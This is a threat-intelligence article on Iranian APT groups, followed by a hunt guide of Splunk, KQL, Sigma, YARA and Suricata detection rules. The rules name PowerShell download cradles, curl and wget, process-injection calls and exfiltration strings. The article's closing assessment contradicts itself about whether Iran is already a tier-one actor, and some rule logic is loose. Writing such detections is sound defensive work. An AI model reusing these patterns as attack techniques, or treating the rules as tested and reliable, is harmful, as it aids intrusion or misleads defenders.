Iran's Cyber Operations Enter New Phase: What Security Teams Need to Know

Iranian state-sponsored cyber operations have reached a new level of sophistication and aggression. Iranian groups have evolved from opportunistic attacks to conducting targeted campaigns against specific sectors with surgical precision.

This shift represents a fundamental change in how Iran approaches cyber warfare. Gone are the days of opportunistic attacks and amateur hour operations. Today's Iranian cyber units operate with military discipline, advanced persistent threat (APT) capabilities, and clear strategic objectives.

The New Iranian Cyber Doctrine

Iranian cyber operations now follow a three-pronged strategy that mirrors traditional military doctrine. First, reconnaissance and intelligence gathering through spear-phishing campaigns targeting high-value individuals. Second, establishing persistent access to critical systems through supply chain compromises and zero-day exploits. Third, preparing for potential destructive attacks while maintaining plausible deniability.

Iranian groups like APT35 (Charming Kitten), APT33 (Elfin), and APT34 (OilRig) have been observed sharing tools and techniques, though they continue to operate as distinct entities with separate targeting priorities. This allows them to share resources, intelligence, and attack techniques across different campaigns.

Iranian groups have been documented using legitimate cloud services including Microsoft 365, Google Drive, Dropbox, and other platforms for hosting payloads and command and control operations. They're also employing living-off-the-land techniques, using PowerShell, WMI, and other built-in Windows tools to avoid detection. The sophistication level now rivals many advanced APT groups.

Target Selection Gets Strategic

Iranian cyber groups have become much more selective about their targets. Instead of casting wide nets, they're focusing on specific sectors that align with Iran's geopolitical objectives. Energy companies, particularly those involved in oil and gas infrastructure, remain primary targets. Defense contractors working on Middle East projects face constant probing attempts.

Telecommunications providers have emerged as a new priority target. Iranian groups understand that compromising telecom infrastructure provides access to communications metadata and the ability to intercept calls and messages. Recent attacks against telecom providers in the Gulf states demonstrate this shift in targeting priorities.

Financial institutions, particularly those with connections to sanctions enforcement, also face increased attention. Iranian groups are not just looking for financial gain. They're gathering intelligence on sanctions compliance systems and identifying potential pressure points for future operations.

Technical Capabilities Advance Rapidly

Iranian cyber units have made significant investments in custom malware development. Tools like HYPERSCRAPE and POWERLESS show sophisticated understanding of enterprise networks and security tools. These are not script kiddie tools. They're professionally developed implants designed for long-term persistence and data exfiltration.

The groups have also improved their operational security significantly. They're using compromised infrastructure in third countries to mask their origins, employing multiple layers of proxies and VPNs, and carefully timing their operations to avoid detection.

Mobile device targeting has become another area of focus. Iranian groups are developing Android and iOS malware specifically designed to compromise smartphones and tablets. They understand that mobile devices often have access to corporate networks through VPN connections and mobile device management systems.

Intelligence Sharing Creates Blind Spots

Proxies and cutouts make attribution even more difficult. Iranian intelligence services are recruiting cybercriminals from other countries to conduct attacks on their behalf. These hired guns provide plausible deniability while executing Iranian strategic objectives. The line between state-sponsored and criminal activity continues to blur.

Some Iranian groups are also selling access to compromised networks to other threat actors. This commercialization of state-sponsored cyber operations creates a secondary market for network access and stolen credentials.

Regional Tensions Drive Cyber Escalation

Middle East tensions directly correlate with Iranian cyber activity levels. Periods of heightened diplomatic tension consistently precede increases in cyber operations. The targeting often reflects current geopolitical disputes, with attacks focusing on countries taking positions contrary to Iranian interests.

Cyber operations serve as a pressure release valve for Iran, allowing them to respond to perceived provocations without risking direct military confrontation. This makes predicting Iranian cyber activity relatively straightforward for those monitoring regional tensions.

The integration of cyber operations with traditional intelligence gathering has also improved. Iranian cyber units now coordinate with human intelligence assets to identify high-value targets and validate stolen information.

What Security Teams Should Do

Defending against Iranian cyber operations requires a multi-layered approach that goes beyond traditional perimeter security. Organizations need to assume breach and focus on detection and response capabilities. Endpoint detection and response (EDR) tools configured to detect living-off-the-land techniques are essential.

Network segmentation becomes critical when facing APT-level threats. Iranian groups excel at lateral movement once they gain initial access. Proper network segmentation can contain breaches and prevent access to critical systems. Zero-trust network architecture provides the best defense against these sophisticated threats.

Employee security awareness training should focus on Iranian APT tactics including: long-term social engineering campaigns that build rapport over months, job-themed lures targeting aerospace and defense employees, and spoofed login pages for cloud services. Training should include examples of actual Iranian phishing emails documented by security vendors.

Threat hunting programs should specifically look for indicators of compromise associated with known Iranian malware families. Regular threat hunting exercises can identify dormant infections before they become active threats.

The Path Forward

Iranian cyber capabilities will continue advancing as long as the country faces international pressure and sanctions. Cyber operations provide an asymmetric response capability that's difficult to defend against and even harder to attribute definitively.

The evolution of Iranian techniques will likely influence other threat actors through the cybercriminal marketplace. What starts as state-sponsored innovation often becomes standard criminal practice within months.

Organizations in targeted sectors need to treat Iranian APT groups as a persistent, sophisticated threat that requires dedicated resources and specialized expertise to defend against. Half-measures will not work against these well-funded, professionally operated threat groups.

Red Sheep Assessment: Iran's cyber doctrine shift from opportunistic to strategic represents a maturation that makes them a tier-one threat actor. The integration of cyber operations with traditional intelligence collection creates a feedback loop that will accelerate their targeting accuracy and operational success. We assess that Iranian capabilities will likely continue to advance, potentially approaching the sophistication level of tier-one threat actors within the next 18 months.

Hunt Guide: Hunt Report: Iranian APT Strategic Campaign Shift

Hypothesis: If Iranian APT groups (APT33/34/35) are active in our environment, we expect to observe PowerShell-based living-off-the-land techniques, cloud service abuse for C2, and targeted spear-phishing against energy/defense/telecom sectors in Windows Security, Sysmon, and cloud audit logs.

Intelligence Summary: Iranian state-sponsored groups including APT33 (Elfin), APT34 (OilRig), and APT35 (Charming Kitten) have evolved from opportunistic attacks to strategic campaigns with military-grade discipline. They now employ sophisticated custom malware (HYPERSCRAPE, POWERLESS), abuse legitimate cloud services for C2, and share tools/TTPs across groups while targeting energy, defense, telecom, and financial sectors aligned with Iranian geopolitical objectives.

Confidence: High | Priority: Critical

Scope

• Networks: All corporate networks with focus on: DMZ systems with internet exposure, VPN endpoints, email gateways, and systems with access to cloud storage services
• Timeframe: Initial sweep: Last 90 days for IOC hunting. Behavioral hunts: Last 30 days with daily execution. Long-term: Continuous monitoring with weekly analysis
• Priority Systems: Energy sector control systems, defense contractor development environments, telecom infrastructure management systems, financial systems handling sanctions data, executive and VIP endpoints, cloud service gateways

MITRE ATT&CK Techniques

T1059.001 — PowerShell (Execution) [P1]

Iranian APTs heavily leverage PowerShell for living-off-the-land techniques to avoid detection, execute payloads, and perform reconnaissance

Splunk SPL:

index=windows (source=WinEventLog:Microsoft-Windows-PowerShell/Operational EventID=4104) OR (source=WinEventLog:Security EventID=4688 CommandLine="*powershell*") | eval sus_encoding=if(match(CommandLine, "(?i)(encodedcommand|ec|e\s+-e|bypass|nop|noni|windowstyle\s+hidden|-w\s+h)"), 1, 0) | eval sus_download=if(match(ScriptBlockText, "(?i)(downloadstring|downloadfile|invoke-webrequest|iwr|wget|curl|net\.webclient)"), 1, 0) | eval sus_execution=if(match(ScriptBlockText, "(?i)(invoke-expression|iex|invoke-command|icm|start-process|\$env:)"), 1, 0) | where sus_encoding=1 OR sus_download=1 OR sus_execution=1 | stats count by Computer, User, CommandLine, ScriptBlockText | sort -count

Elastic KQL:

(event.provider:"Microsoft-Windows-PowerShell" AND event.code:4104) OR (event.provider:"Microsoft-Windows-Security-Auditing" AND event.code:4688 AND process.command_line:*powershell*) AND (process.command_line:(*encodedcommand* OR *bypass* OR *-nop* OR *hidden* OR *-w h*) OR powershell.file.script_block_text:(*downloadstring* OR *downloadfile* OR *invoke-webrequest* OR *iwr* OR *wget* OR *webclient* OR *invoke-expression* OR *iex* OR *invoke-command*))

Sigma Rule:

title: Iranian APT PowerShell Living-off-the-Land Techniques
id: 8d7b3c3d-9e41-4f8b-8c0a-0e5d7e8b3a4f
status: production
description: Detects PowerShell execution patterns consistent with Iranian APT groups
references:
    - Internal threat intelligence
author: Threat Hunt Team
date: 2024/01/15
modified: 2024/01/15
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_powershell:
        - CommandLine|contains:
            - 'powershell'
            - 'pwsh'
        - Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_suspicious:
        CommandLine|contains:
            - '-encodedcommand'
            - '-ec'
            - '-e '
            - '-bypass'
            - '-nop'
            - '-noni'
            - '-windowstyle hidden'
            - '-w h'
            - 'downloadstring'
            - 'downloadfile'
            - 'invoke-webrequest'
            - 'iwr'
            - 'invoke-expression'
            - 'iex'
    condition: selection_powershell and selection_suspicious
falsepositives:
    - Legitimate administrative scripts
    - Software installation scripts
level: high

Focus on encoded commands and download cradles. Whitelist known admin scripts by hash. Monitor for parent process anomalies (e.g., Word/Excel spawning PowerShell).

T1566.001 — Spearphishing Attachment (Initial Access) [P1]

Iranian APTs conduct targeted spear-phishing campaigns with job-themed lures targeting aerospace/defense employees and long-term social engineering

Splunk SPL:

index=email OR index=o365 (subject="*job*" OR subject="*position*" OR subject="*career*" OR subject="*resume*" OR subject="*CV*") (attachment_name="*.doc*" OR attachment_name="*.xls*" OR attachment_name="*.pdf" OR attachment_name="*.zip") | eval suspicious_sender=if(match(sender_domain, "(gmail|yahoo|hotmail|outlook)\.com$") OR NOT match(sender_domain, recipient_domain), 1, 0) | eval defense_sector=if(match(recipient_email, "@(boeing|lockheed|raytheon|northrop|general-dynamics|bae)"), 1, 0) | where suspicious_sender=1 OR defense_sector=1 | stats count by sender_email, recipient_email, subject, attachment_name | sort -count

Elastic KQL:

(event.dataset:email OR event.dataset:o365) AND (email.subject:(*job* OR *position* OR *career* OR *resume* OR *CV*)) AND (email.attachments.file.name:(*.doc* OR *.xls* OR *.pdf OR *.zip)) AND (email.from.address:(*@gmail.com OR *@yahoo.com OR *@hotmail.com OR *@outlook.com) OR email.to.address:(*@boeing* OR *@lockheed* OR *@raytheon* OR *@northrop* OR *@general-dynamics* OR *@bae*))

Sigma Rule:

title: Iranian APT Spearphishing Detection
id: 7f8b9c8d-8e41-5f9b-9c1a-1e6d8e9b4a5f
status: production
description: Detects spearphishing attempts with job-themed lures targeting defense sector
logsource:
    service: email
detection:
    selection_subject:
        Subject|contains:
            - 'job'
            - 'position'
            - 'career'
            - 'resume'
            - 'CV'
    selection_attachment:
        AttachmentName|endswith:
            - '.docx'
            - '.doc'
            - '.xlsx'
            - '.xls'
            - '.pdf'
            - '.zip'
    selection_suspicious:
        - SenderDomain|endswith:
            - 'gmail.com'
            - 'yahoo.com'
            - 'hotmail.com'
            - 'outlook.com'
        - RecipientDomain|contains:
            - 'boeing'
            - 'lockheed'
            - 'raytheon'
            - 'northrop'
            - 'general-dynamics'
            - 'bae'
    condition: selection_subject and selection_attachment and selection_suspicious
level: high

Cross-reference with sender reputation services. Alert on first-time senders to VIPs. Check for domain typosquatting variations.

T1102 — Web Service (Command and Control) [P2]

Iranian APTs abuse legitimate cloud services (Microsoft 365, Google Drive, Dropbox) for payload hosting and C2 operations

Splunk SPL:

index=proxy OR index=dns OR index=sysmon (dest_host="*.storage.googleapis.com" OR dest_host="*.1drv.com" OR dest_host="*.sharepoint.com" OR dest_host="*.dropbox.com" OR dest_host="*.box.com" OR dest_host="*.mega.nz") | eval process_suspicious=if(match(process_name, "(?i)(powershell|cmd|wscript|cscript|mshta|rundll32)"), 1, 0) | eval user_agent_suspicious=if(match(user_agent, "(?i)(python|curl|wget|powershell|windowspowershell)") OR user_agent="-" OR isnull(user_agent), 1, 0) | eval bytes_out_suspicious=if(bytes_out > 1048576, 1, 0) | where process_suspicious=1 OR user_agent_suspicious=1 OR bytes_out_suspicious=1 | stats sum(bytes_out) as total_bytes, count by src_ip, dest_host, process_name, user_agent | sort -total_bytes

Elastic KQL:

(destination.domain:(*.storage.googleapis.com OR *.1drv.com OR *.sharepoint.com OR *.dropbox.com OR *.box.com OR *.mega.nz)) AND (process.name:(powershell* OR cmd* OR wscript* OR cscript* OR mshta* OR rundll32*) OR user_agent.original:(python* OR curl* OR wget* OR *powershell* OR "-") OR network.bytes_out:>1048576)

Sigma Rule:

title: Iranian APT Cloud Service Abuse for C2
id: 9f9b8c9d-9e51-6f9b-9c2a-2e7d9e9b5a6f
status: production
description: Detects abuse of legitimate cloud services for C2 by Iranian APTs
logsource:
    category: proxy
detection:
    selection_domains:
        c-uri|contains:
            - '.storage.googleapis.com'
            - '.1drv.com'
            - '.sharepoint.com'
            - '.dropbox.com'
            - '.box.com'
            - '.mega.nz'
    selection_suspicious:
        - c-useragent|contains:
            - 'python'
            - 'curl'
            - 'wget'
            - 'powershell'
        - c-useragent: '-'
        - cs-bytes: '>1048576'
    condition: selection_domains and selection_suspicious
falsepositives:
    - Legitimate file sharing
    - Backup software
level: medium

Baseline normal cloud storage usage per user. Alert on new cloud service destinations from servers. Monitor for binary/encrypted file uploads.

T1218.001 — Compiled HTML File (Defense Evasion) [P1]

Iranian APTs use mshta.exe and other LOLBins to execute malicious scripts while evading detection

Splunk SPL:

index=windows (sourcetype=WinEventLog:Security EventID=4688 OR sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventID=1) (Image="*\\mshta.exe" OR Image="*\\rundll32.exe" OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\cscript.exe" OR Image="*\\wscript.exe") | eval remote_execution=if(match(CommandLine, "(?i)(http|https|ftp)://"), 1, 0) | eval suspicious_parent=if(match(ParentImage, "(?i)(winword|excel|powerpnt|outlook|chrome|firefox|iexplore)"), 1, 0) | eval obfuscated=if(match(CommandLine, "(?i)(javascript:|vbscript:|about:)"), 1, 0) | where remote_execution=1 OR suspicious_parent=1 OR obfuscated=1 | stats count by Computer, User, Image, CommandLine, ParentImage | sort -count

Elastic KQL:

(event.code:(1 OR 4688)) AND (process.executable:(*\\mshta.exe OR *\\rundll32.exe OR *\\regsvr32.exe OR *\\wmic.exe OR *\\cscript.exe OR *\\wscript.exe)) AND (process.command_line:(*http://* OR *https://* OR *ftp://*) OR process.parent.name:(winword* OR excel* OR powerpnt* OR outlook* OR chrome* OR firefox* OR iexplore*) OR process.command_line:(*javascript:* OR *vbscript:* OR *about:*))

Sigma Rule:

title: Iranian APT LOLBin Execution
id: af9b9c9d-ae61-7f9b-ac3a-3e8d9eab6a7f
status: production
description: Detects LOLBin abuse patterns used by Iranian APTs
logsource:
    category: process_creation
    product: windows
detection:
    selection_process:
        Image|endswith:
            - '\mshta.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
            - '\wmic.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    selection_suspicious:
        - CommandLine|contains:
            - 'http://'
            - 'https://'
            - 'ftp://'
            - 'javascript:'
            - 'vbscript:'
            - 'about:'
        - ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\outlook.exe'
    condition: selection_process and selection_suspicious
level: high

Monitor for uncommon command line arguments. Track frequency of LOLBin usage per system. Alert on execution from user writeable directories.

T1055 — Process Injection (Defense Evasion) [P1]

HYPERSCRAPE and POWERLESS malware use process injection for persistence and defense evasion

Splunk SPL:

index=sysmon (EventCode=8 OR EventCode=10 OR EventCode=7) | eval injection_target=case(EventCode=8, TargetImage, EventCode=10, TargetImage, EventCode=7, ImageLoaded) | eval suspicious_source=if(match(SourceImage, "(?i)(powershell|cmd|wscript|cscript|mshta|rundll32)"), 1, 0) | eval suspicious_target=if(match(injection_target, "(?i)(explorer|svchost|lsass|services|winlogon|csrss|chrome|firefox|outlook)"), 1, 0) | eval remote_thread=if(EventCode=8 AND StartFunction!="-", 1, 0) | where (suspicious_source=1 AND suspicious_target=1) OR remote_thread=1 | stats count by Computer, SourceImage, injection_target, EventCode | sort -count

Elastic KQL:

(event.code:(7 OR 8 OR 10) AND event.provider:"Microsoft-Windows-Sysmon") AND ((process.name:(powershell* OR cmd* OR wscript* OR cscript* OR mshta* OR rundll32*) AND (sysmon.target_process.name:(explorer* OR svchost* OR lsass* OR services* OR winlogon* OR csrss* OR chrome* OR firefox* OR outlook*) OR dll.name:(explorer* OR svchost* OR lsass* OR services* OR winlogon* OR csrss*))) OR (event.code:8 AND sysmon.start_function:*))

Sigma Rule:

title: Iranian APT Process Injection Activity
id: bf9b9d9d-ae71-8f9b-ad3a-4e8d9eac7a8f
status: production
description: Detects process injection patterns used by HYPERSCRAPE/POWERLESS malware
logsource:
    product: windows
    service: sysmon
detection:
    selection_createthread:
        EventID: 8
        SourceImage|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\rundll32.exe'
        TargetImage|endswith:
            - '\explorer.exe'
            - '\svchost.exe'
            - '\lsass.exe'
            - '\services.exe'
            - '\winlogon.exe'
            - '\csrss.exe'
    selection_processaccess:
        EventID: 10
        GrantedAccess|contains:
            - '0x1F0FFF'
            - '0x1F1FFF'
            - '0x1F3FFF'
            - '0x1FFFFF'
    condition: selection_createthread or selection_processaccess
falsepositives:
    - Security software
    - System management tools
level: high

Focus on PROCESS_ALL_ACCESS permissions. Cross-reference with network connections from injected processes. Monitor for process hollowing indicators.

T1071.001 — Web Protocols (Command and Control) [P2]

Iranian APTs use compromised infrastructure in third countries with multiple proxy layers for C2 communications

Splunk SPL:

index=proxy OR index=firewall | eval suspicious_port=if(dest_port IN (8080, 8443, 8888, 9090, 3128, 1080), 1, 0) | eval rare_domain=if(match(dest_host, "\.(tk|ml|ga|cf|click|download|online)$"), 1, 0) | eval suspicious_country=if(dest_country IN ("Iran", "Russia", "China", "North Korea", "Romania", "Bulgaria"), 1, 0) | eval long_session=if(duration > 3600, 1, 0) | eval high_volume=if(bytes_out > 10485760, 1, 0) | where suspicious_port=1 OR rare_domain=1 OR suspicious_country=1 OR (long_session=1 AND high_volume=1) | stats sum(bytes_out) as total_bytes, count by src_ip, dest_host, dest_country, dest_port | sort -total_bytes

Elastic KQL:

(event.category:network) AND (destination.port:(8080 OR 8443 OR 8888 OR 9090 OR 3128 OR 1080) OR destination.domain:(*.tk OR *.ml OR *.ga OR *.cf OR *.click OR *.download OR *.online) OR destination.geo.country_name:("Iran" OR "Russia" OR "China" OR "North Korea" OR "Romania" OR "Bulgaria") OR (event.duration:>3600000000000 AND network.bytes_out:>10485760))

Sigma Rule:

title: Iranian APT C2 Communication Patterns
id: cf9b9e9d-be81-9f9b-bd4a-5e9d9ead8a9f
status: production
description: Detects C2 communication patterns used by Iranian APT groups
logsource:
    category: proxy
detection:
    selection_suspicious_ports:
        dst_port:
            - 8080
            - 8443
            - 8888
            - 9090
            - 3128
            - 1080
    selection_suspicious_domains:
        c-uri|endswith:
            - '.tk'
            - '.ml'
            - '.ga'
            - '.cf'
            - '.click'
            - '.download'
            - '.online'
    selection_suspicious_countries:
        dst_country:
            - 'IR'
            - 'RU'
            - 'CN'
            - 'KP'
            - 'RO'
            - 'BG'
    selection_long_session:
        duration: '>3600'
        cs_bytes: '>10485760'
    condition: selection_suspicious_ports or selection_suspicious_domains or selection_suspicious_countries or selection_long_session
falsepositives:
    - Legitimate proxy usage
    - VPN connections
level: medium

Baseline proxy usage patterns. Alert on new international destinations. Monitor for consistent beacon intervals suggesting automated C2.

T1027 — Obfuscated Files or Information (Defense Evasion) [P2]

Iranian APT malware uses sophisticated obfuscation including encrypted payloads and multi-layer encoding

Splunk SPL:

index=av OR index=edr OR index=sysmon EventCode=11 | eval high_entropy=if(file_entropy > 7.5, 1, 0) | eval suspicious_extension=if(match(file_name, "\.(tmp|dat|bin|db)$"), 1, 0) | eval suspicious_location=if(match(file_path, "(?i)(\\temp\\|\\appdata\\|\\programdata\\)"), 1, 0) | eval double_extension=if(match(file_name, "\.(jpg|png|pdf|doc|xls)\.(exe|scr|bat|cmd|ps1)"), 1, 0) | where high_entropy=1 OR (suspicious_extension=1 AND suspicious_location=1) OR double_extension=1 | stats count by Computer, file_path, file_name, file_hash | sort -count

Elastic KQL:

(event.code:11 OR event.category:malware) AND (file.entropy:>7.5 OR (file.extension:(tmp OR dat OR bin OR db) AND file.path:(*\\Temp\\* OR *\\AppData\\* OR *\\ProgramData\\*)) OR file.name:(*.jpg.exe OR *.png.exe OR *.pdf.exe OR *.doc.exe OR *.xls.exe OR *.jpg.scr OR *.png.scr OR *.pdf.scr))

Sigma Rule:

title: Iranian APT File Obfuscation Detection
id: df9b9f9d-be91-af9b-cd5a-6e9d9ead9a9f
status: production
description: Detects obfuscated files associated with Iranian APT malware
logsource:
    product: windows
    service: sysmon
    definition: 'Requirements: Sysmon EventID 11 with file entropy calculation'
detection:
    selection_high_entropy:
        EventID: 11
        FileEntropy: '>7.5'
    selection_suspicious_location:
        EventID: 11
        TargetFilename|contains:
            - '\Temp\'
            - '\AppData\'
            - '\ProgramData\'
        TargetFilename|endswith:
            - '.tmp'
            - '.dat'
            - '.bin'
            - '.db'
    selection_double_extension:
        EventID: 11
        TargetFilename|re: '.*\.(jpg|png|pdf|doc|xls)\.(exe|scr|bat|cmd|ps1)$'
    condition: selection_high_entropy or selection_suspicious_location or selection_double_extension
falsepositives:
    - Encrypted files
    - Compressed archives
level: medium

Calculate Shannon entropy for dropped files. Alert on files with entropy > 7.5. Monitor for rapid file creation/deletion patterns.

T1083 — File and Directory Discovery (Discovery) [P3]

Iranian APTs perform extensive reconnaissance to identify high-value data before exfiltration

Splunk SPL:

index=windows (EventCode=4663 OR EventCode=1 OR EventCode=4104) | eval recon_commands=if(match(CommandLine, "(?i)(dir|ls|tree|where|find|get-childitem|gci)"), 1, 0) | eval sensitive_paths=if(match(ObjectName, "(?i)(desktop|documents|downloads|onedrive|sharepoint|\\\\.*\\.*\$|password|secret|confidential|classified)"), 1, 0) | eval rapid_discovery=if(EventCode=4663, 1, 0) | eventstats count as access_count by Computer, Account, ObjectName | where (recon_commands=1 AND sensitive_paths=1) OR (rapid_discovery=1 AND access_count > 100) | stats count by Computer, Account, CommandLine, ObjectName | sort -count

Elastic KQL:

(event.code:(4663 OR 1 OR 4104)) AND ((process.command_line:(dir OR ls OR tree OR where OR find OR get-childitem OR gci) AND (file.path:(*desktop* OR *documents* OR *downloads* OR *onedrive* OR *sharepoint* OR *password* OR *secret* OR *confidential* OR *classified*) OR winlog.event_data.ObjectName:(*desktop* OR *documents* OR *downloads* OR *onedrive* OR *sharepoint* OR *password* OR *secret* OR *confidential* OR *classified*))) OR (event.code:4663 AND winlog.event_data.AccessMask:*))

Sigma Rule:

title: Iranian APT File Discovery Activity
id: ef9b9f9d-ce91-af9b-dd5a-7e9d9ead9aaf
status: production
description: Detects reconnaissance activity for high-value files
logsource:
    product: windows
detection:
    selection_recon_commands:
        EventID: 
            - 1
            - 4688
        CommandLine|contains:
            - 'dir '
            - 'ls '
            - 'tree '
            - 'where '
            - 'find '
            - 'get-childitem'
            - 'gci '
    selection_sensitive_paths:
        - ObjectName|contains:
            - 'desktop'
            - 'documents'
            - 'downloads'
            - 'onedrive'
            - 'sharepoint'
            - 'password'
            - 'secret'
            - 'confidential'
            - 'classified'
        - CommandLine|contains:
            - 'desktop'
            - 'documents'
            - 'downloads'
            - 'onedrive'
            - 'sharepoint'
            - 'password'
            - 'secret'
            - 'confidential'
            - 'classified'
    condition: selection_recon_commands and selection_sensitive_paths
falsepositives:
    - System administrators
    - Backup software
level: medium

Baseline normal file access patterns. Alert on access to multiple sensitive directories in short timeframe. Monitor for recursive directory listings.

YARA Rules

Iranian_APT_HYPERSCRAPE_Indicators — Detects HYPERSCRAPE malware based on behavioral patterns and strings

rule Iranian_APT_HYPERSCRAPE_Indicators {
    meta:
        description = "Detects HYPERSCRAPE malware used by Iranian APT groups"
        author = "Threat Hunt Team"
        date = "2024-01-15"
        reference = "Iranian APT Campaign Analysis"
        severity = "high"
        mitre_attack = "T1055, T1059.001"
    
    strings:
        $str1 = "HYPERSCRAPE" ascii wide nocase
        $str2 = "scrape_config" ascii
        $str3 = "exfil_data" ascii
        $str4 = "cloud_upload" ascii
        
        $ps1 = "powershell.exe" ascii wide nocase
        $ps2 = "-EncodedCommand" ascii wide nocase
        $ps3 = "Invoke-Expression" ascii wide nocase
        $ps4 = "DownloadString" ascii wide nocase
        
        $mutex1 = "Global\\HYPERSCRAPE_MTX" ascii wide
        $mutex2 = "Local\\scraper_active" ascii wide
        
        $c2_1 = ".storage.googleapis.com" ascii
        $c2_2 = ".1drv.com" ascii
        $c2_3 = ".sharepoint.com" ascii
        
        $hex_pattern = {48 8B ?? ?? ?? ?? ?? 48 89 ?? ?? ?? ?? ?? E8}
    
    condition:
        uint16(0) == 0x5A4D and filesize < 5MB and
        (2 of ($str*) or 2 of ($ps*) or 1 of ($mutex*) or 1 of ($c2_*) or $hex_pattern)
}

Iranian_APT_POWERLESS_Malware — Detects POWERLESS malware family used by Iranian threat actors

rule Iranian_APT_POWERLESS_Malware {
    meta:
        description = "Detects POWERLESS malware family used by Iranian APT groups"
        author = "Threat Hunt Team"
        date = "2024-01-15"
        reference = "Iranian APT Campaign Analysis"
        severity = "high"
        mitre_attack = "T1055, T1027"
    
    strings:
        $str1 = "POWERLESS" ascii wide nocase
        $str2 = "power_module" ascii
        $str3 = "inject_thread" ascii
        $str4 = "evade_detection" ascii
        
        $inject1 = "CreateRemoteThread" ascii
        $inject2 = "WriteProcessMemory" ascii
        $inject3 = "VirtualAllocEx" ascii
        $inject4 = "NtCreateThreadEx" ascii
        
        $obfusc1 = {00 00 00 00 ?? ?? ?? ?? [4-32] FF FF FF FF}
        $obfusc2 = {41 42 43 44 45 46 47 48 [8-16] 5A 59 58 57 56 55 54 53}
        
        $anti_debug = "IsDebuggerPresent" ascii
        $anti_vm = "VMwareService.exe" ascii wide
    
    condition:
        uint16(0) == 0x5A4D and filesize < 10MB and
        (2 of ($str*) and 2 of ($inject*)) or
        (1 of ($str*) and $obfusc1 and $obfusc2) or
        (3 of ($inject*) and ($anti_debug or $anti_vm))
}

Suricata Rules

SID 2024001 — Iranian APT Cloud C2 Communication - Google Storage

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Iranian APT Cloud C2 Communication - Google Storage"; flow:established,to_server; content:"GET"; http_method; content:".storage.googleapis.com"; http_host; pcre:"/\/[a-z0-9]{32,64}\.(bin|dat|tmp|db)/i"; content:"User-Agent|3a 20|"; http_header; pcre:"/User-Agent\x3a\x20(python|curl|wget|PowerShell)/i"; threshold: type limit, track by_src, count 1, seconds 3600; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024001; rev:1;)

SID 2024002 — Iranian APT Cloud C2 Communication - Microsoft OneDrive

alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Iranian APT Cloud C2 Communication - Microsoft OneDrive"; flow:established,to_server; content:"|16 03|"; within:2; content:"1drv.com"; nocase; content:"onedrive.live.com"; nocase; fast_pattern; threshold: type threshold, track by_src, count 10, seconds 60; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024002; rev:1;)

SID 2024003 — Iranian APT Spearphishing Landing Page

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET PHISHING Iranian APT Spearphishing Landing Page"; flow:established,from_server; content:"200"; http_stat_code; content:"<title>"; http_server_body; content:"job"; http_server_body; distance:0; within:50; nocase; pcre:"/\<title\>[^<]*(job|career|position|resume|cv)[^<]*\<\/title\>/i"; content:"<form"; http_server_body; content:"password"; http_server_body; distance:0; within:500; nocase; reference:url,internal.threat.report/iranian-apt; classtype:social-engineering; sid:2024003; rev:1;)

SID 2024004 — Iranian APT PowerShell Download Cradle

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Iranian APT PowerShell Download Cradle"; flow:established,to_server; content:"GET"; http_method; content:".ps1"; http_uri; nocase; pcre:"/\/(download|payload|update|script)[0-9]*\.ps1/i"; content:"User-Agent|3a 20|WindowsPowerShell"; http_header; threshold: type limit, track by_src, count 1, seconds 600; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024004; rev:1;)

SID 2024005 — Iranian APT Proxy Chain Communication

alert tcp $HOME_NET any -> $EXTERNAL_NET [8080,8443,8888,9090,3128,1080] (msg:"ET TROJAN Iranian APT Proxy Chain Communication"; flow:established,to_server; content:"|05 01|"; depth:2; content:"|05 01 00|"; distance:0; within:3; threshold: type both, track by_src, count 3, seconds 300; reference:url,internal.threat.report/iranian-apt; classtype:trojan-activity; sid:2024005; rev:1;)

Data Source Requirements

Sources

• Iran's Cyber Operations Enter New Phase: What Security Teams Need to Know